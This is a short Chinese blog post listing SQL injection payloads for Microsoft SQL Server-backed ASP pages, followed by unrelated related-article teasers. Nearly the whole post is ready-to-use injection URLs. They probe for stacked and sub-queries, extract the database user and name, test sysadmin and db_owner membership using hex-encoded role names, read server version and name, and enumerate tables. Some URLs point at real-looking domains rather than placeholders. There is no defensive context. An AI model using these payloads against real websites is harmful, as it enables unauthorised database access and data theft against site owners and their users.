SQL 注入有常用語句

原創 aivii 2020-02-22 04:21

是否支持多句查詢
http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int--

是否支持子查詢
http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0

返回用戶名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And user%2Bchar(124)=0

當前用戶是否爲 sysadmin 固定服務器角色的成員。
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1

PS:0x730079007300610064006D0069006E00 = sysadmin

當前用戶是否爲 db_owner 固定數據庫角色的成員
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1

0x640062005F006F0077006E0065007200 = db_owner

返回數據庫名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And db_name()%2Bchar(124)=0

操作系統和SQLserver版本
http://www.99568.com/99568news/shownews.asp?id=51 And @@version = 1

本地服務器名稱
http://www.99568.com/99568news/shownews.asp?id=51 And @@SERVERNAME = 1

http://www.xxx.com.cn/newhomelink/site/News/Content.asp?NewsID=1077  And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一個表名

aivii
發佈了29 篇原創文章 · 獲贊 0 · 訪問量 5萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

「實戰應用」如何用圖表控件LightningChart JS創建SQL儀表板應用(一)

LightningChart JS是Web上性能特高的圖表庫,具有出色的執行性能 - 使用高數據速率同時監控數十個數據源。 GPU加速和WebGL渲染確保您的設備的圖形處理器得到有效利用,從而實現高刷新率和流暢的動畫,常用於貿易,工程,航空

原創 2024-06-03 12:21:43

數據庫管理哪家強*Devart VS Navicat 360°全方位對比解析

今天我們向大家推薦的是兩個開發環節的主流數據庫管理品牌*那麼你知道這兩款數據庫管理軟件品牌與 數據庫引擎配套的管理軟件有什麼區別嗎*小編這就360°全方位爲您解答* ★ 品牌介紹 Devart*擁有超過20年的經驗*利用最新的技術創造創新的

原創 2024-06-03 12:21:42

sql server 2008 r2 自動備份及清除計劃,自動備份成功,但刪除過期文件失敗

1,打開“開始”菜單,進入SQL Server配置管理器。 2,點擊選擇“SQL Server Services”,右側選擇“SQL Server(MSSQLSERVER)”。 3,右鍵,選擇“屬性”,點擊“Log on as”,選中“

Raphael98 2024-05-13 21:24:51

Sql Server數據庫sql語句去除所有空格

空格包含一般空格和特殊空格。 1、一般空格 前後的空格,使用LTRIM()和RTRIM()即可,例如:LTRIM(RTRIM(name)) 中間的空格,使用REPLACE()函數替換,例如:REPLACE(name,' ','') 2、特殊

原創 2024-05-08 23:32:56

自動化Reddit圖片收集:Python爬蟲技巧

引言 Reddit,作爲一個全球性的社交平臺,擁有海量的用戶生成內容,其中包括大量的圖片資源。對於數據科學家、市場研究人員或任何需要大量圖片資源的人來說,自動化地從Reddit收集圖片是一個極具價值的技能。本文將詳細介紹如何使用Pyth

原創 2024-06-05 00:06:19

聊聊Spring中的數據綁定 --- WebDataBinder、ServletRequestDataBinder、WebBindingInitializer 文章源於Ai生成

每篇一句 大魔王張怡寧:女兒,這堆金牌你拿去玩吧,但我的銀牌不能給你玩。你要想玩銀牌就去找你王浩叔叔吧,他那銀牌多 前言 爲了講述好Spring MVC最爲複雜的數據綁定這塊,我前面可謂是做足了功課,對此部分知識此處給小夥伴留一個學

微學網絡 2024-05-27 10:53:57

鯤鵬平臺的銀河麒麟,修復音頻

$ lspci | grep -i audio $ lsusb | grep -i audio # 清理並重裝 pulseaudio $ sudo apt remove --purge alsa-base pulseaudio ukui-m

原創 2024-05-25 14:13:03

分佈式任務調度內的 MySQL 分頁查詢優化

作者:vivo 互聯網數據庫團隊- Qiu Xinbo 本文主要通過圖示介紹了用主鍵進行分片查詢的過程,介紹了主鍵分頁查詢存在SQL性能問題,如何去創建高效的索引去優化主鍵分頁查詢的SQL性能問題 對於數據分佈不均

原創 2024-05-24 12:09:18

海外媒介效果分析就這麼做!

如何在數據安全與合規的前提下,高效地追蹤海外多媒體平臺的投放流量,有效歸因分析投放效果,持續優化企業在海外媒體的一系列營銷動作? 針對企業客戶的這一需求,神策數據從專業性和效率最佳兩個角度綜合考慮,接入多家第三方 MMP(Mobile

原創 2024-05-21 21:52:18

突破目標網站的反爬蟲機制:Selenium策略分析

在當今信息爆炸的互聯網時代,獲取數據變得越來越重要,而網絡爬蟲成爲了一種常見的數據獲取工具。然而,隨着各大網站加強反爬蟲技術,爬蟲程序面臨着越來越多的挑戰。本文將以爬取百度搜索結果爲例,介紹如何使用Selenium結合一系列策略來突破目標

原創 2024-05-16 00:10:51

CVE復現之老洞新探(CVE-2021-3156)

環境搭建 直接拉取合適的docker docker 環境: https://hub.docker.com/r/chenaotian/cve-2021-3156 下載glibc-2.27源碼和sudo-1.8.21源碼 漏洞分析

原創 2024-05-08 22:52:37

Python 爬蟲:Spring Boot 反爬蟲的成功案例

前言 在當今數字化時代,網絡數據成爲了信息獲取和分析的重要來源之一。然而,隨着網絡數據的廣泛應用,爬蟲技術也逐漸成爲了互聯網行業的熱門話題。爬蟲技術的應用不僅可以幫助企業獲取有價值的信息,還可以用於數據分析、市場研究等領域。然而,隨着爬

原創 2024-05-07 23:26:04

llama.cpp備忘

./main -m /mnt/e/Llama3-8B-Chinese-Chat.Q6_K.gguf -n -1 --color -r "User:" --in-prefix " " -i --n-predict 512 --repeat-p

原創 2024-05-07 12:15:49

php7.4編譯

 wget https://www.php.net/distributions/php-7.4.33.tar.gz  ./configure --prefix=/usr/local/php7.4 --with-openssl --with-

charley158 2024-04-28 23:51:42

一次奇妙的任意用戶登錄實戰

剛剛進行了微信sessionkey的學習,正準備實戰一下,就發現了這個神奇的網站,預知後事如何。請繼續向下看去 1. 目標 2. 開局一個登錄框 3. 首先,直接弱口令走起來,萬一留有測試的賬號呢 嘗試,1311111111,1333

原創 2024-04-22 22:46:11